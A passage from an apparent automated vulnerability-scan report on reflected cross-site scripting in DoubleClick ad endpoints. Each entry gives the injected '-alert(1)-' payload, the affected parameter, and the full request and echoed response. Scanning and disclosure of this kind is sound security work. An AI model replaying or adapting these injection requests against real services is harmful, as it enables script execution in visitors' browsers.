Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6560
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:41:19 GMT
Expires: Tue, 26 Apr 2011 18:41:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=121f1"-alert(1)-"a54ea376143http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B62431291%3B19184-954/60%3B40480661/40498448/1%3B%3B%7Esscs%3D%3fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/job_map_f?cid=
...[SNIP]...

5.13. http://ad.doubleclick.net/adi/N5506.MSN/B5070033.105 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5506.MSN/B5070033.105

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1ecf"-alert(1)-"c71a3ff6507 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N5506.MSN/B5070033.105;sz=954x60;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!d1ecf"-alert(1)-"c71a3ff6507&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=;ord=1747665210? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:39:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6560

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
7/TT_CoreGPS_JobMapFree_YahooTax_954x60.jpg";
var minV = 9;
var FWH = ' width="954" height="60" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00049/120000000000044726.1?!d1ecf"-alert(1)-"c71a3ff6507&&PID=8568160&UIT=G&TargetID=37577241&AN=1747665210&PG=INVPFO&ASID=8a0f1b24b0e94ac698dd5d301aea1010&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/dd/%2a/r%3B239596046%3B1-0%3B0%3B6243129
...[SNIP]...

5.14. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58b7d"-alert(1)-"d594f3953b8 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=843190458b7d"-alert(1)-"d594f3953b8&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:35 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=843190458b7d"-alert(1)-"d594f3953b8&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/y%3B238055145%3B0-0%3B0%3B60965164%3B4307-300/25
...[SNIP]...

5.15. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cce8"-alert(1)-"9bf53ef1aeb was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=5711655104cce8"-alert(1)-"9bf53ef1aeb&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:42:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
) ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=5711655104cce8"-alert(1)-"9bf53ef1aeb&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/g%3B238055498%3B0-0%3B0%3B60965164%3B4307-300/250%3B41093370/41111157/2%3B%3B%7Esscs
...[SNIP]...

5.16. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84d99"-alert(1)-"61719917f50 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e84d99"-alert(1)-"61719917f50&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:42:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e84d99"-alert(1)-"61719917f50&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/y%3B238055145%3B0-0%3B0%3B60965164%3B4307-300/250%3B41093361/41111148/2%3B%3B%7Esscs%3D%3f";
this.clickN = "0";

...[SNIP]...

5.17. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54eb3"-alert(1)-"db1f9ed8dee was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR54eb3"-alert(1)-"db1f9ed8dee&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:42:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
gitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR54eb3"-alert(1)-"db1f9ed8dee&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/g%3B238055498%3B0-0%3B0%3B60965164%3B4307-300/250%3B41093370/41111157/2%3B%3B%7Esscs%3D%3f";

...[SNIP]...

5.18. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90776"-alert(1)-"bf4f4a050a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=836734390776"-alert(1)-"bf4f4a050a&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:42:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37424

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=836734390776"-alert(1)-"bf4f4a050a&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/d9/%2a/y%3B238055145%3B0-0%3B0%3B60965164%3B4307-300/250%3B41093361/41111148/2
...[SNIP]...

5.19. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b2b0c"-alert(1)-"b64a598cf19 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=Gb2b0c"-alert(1)-"b64a598cf19&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=Gb2b0c"-alert(1)-"b64a598cf19&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/j%3B238055452%3B0-0%3B0%3B60965164%3B4307-300/250%3B41
...[SNIP]...

5.20. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [destination parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edbfd"-alert(1)-"dcc08de5e14 was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=edbfd"-alert(1)-"dcc08de5e14 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 37427
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 26 Apr 2011 18:43:09 GMT
Expires: Tue, 26 Apr 2011 18:43:09 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
oughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=edbfd"-alert(1)-"dcc08de5e14http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/j%3B238055452%3B0-0%3B0%3B60965164%3B4307-300/250%3B41093366/41111153/2%3B%3B%7Esscs%3D%3f";
this.clickN = "0";
t
...[SNIP]...

5.21. http://ad.doubleclick.net/adi/N6092.msn/B5302320.25 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N6092.msn/B5302320.25

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 522ce"-alert(1)-"6f4be5c894c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N6092.msn/B5302320.25;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!522ce"-alert(1)-"6f4be5c894c&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=;ord=571165510? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Tue, 26 Apr 2011 18:41:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 37427

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
")
+ (('' != "") ? ('&longitude=' + '') : "");
this.clickThroughUrl = "http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD00046/54000000000036088.1?!522ce"-alert(1)-"6f4be5c894c&&PID=8431904&UIT=G&TargetID=8367343&AN=571165510&PG=CCHAPR&ASID=1ae891ce48eb4e4da833d9383fd8216e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/g%3B238055498%3B0-0%3B0%3B60965164%
...[SNIP]...

5.22. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e97dd"-alert(1)-"9bf7dd8f0c5 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908e97dd"-alert(1)-"9bf7dd8f0c5&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8197

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...
lip_Banner_White_NewLogo_728x90.gif";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908e97dd"-alert(1)-"9bf7dd8f0c5&UIT=G&TargetID=20877353&AN=704858127&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3af5/17/da/%2a/w%3B232789996%3B1-0%3B0%3B56669790%3B3454-728/9
...[SNIP]...

5.23. http://ad.doubleclick.net/adj/N5047.MSN/B3795397.61 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5047.MSN/B3795397.61

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a80e"-alert(1)-"f1d880c1fb0 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5047.MSN/B3795397.61;sz=728x90;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003B/3000000000029484.1?!&&PID=8530908&UIT=G&TargetID=20877353&AN=7048581277a80e"-alert(1)-"f1d880c1fb0&PG=CCH9AC&ASID=a199987ebd4c4ad39027d7ef69e208eb&destination=;ord=704858127? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Tue, 26 Apr 2011 18:41:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8197

document.write('<!-- Template Id = 11,448 Template Name = Coremetrics Impression Template - FLASH -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/87
...[SNIP]...

var minV = 8;
var FWH = ' width="728" height="90" ';
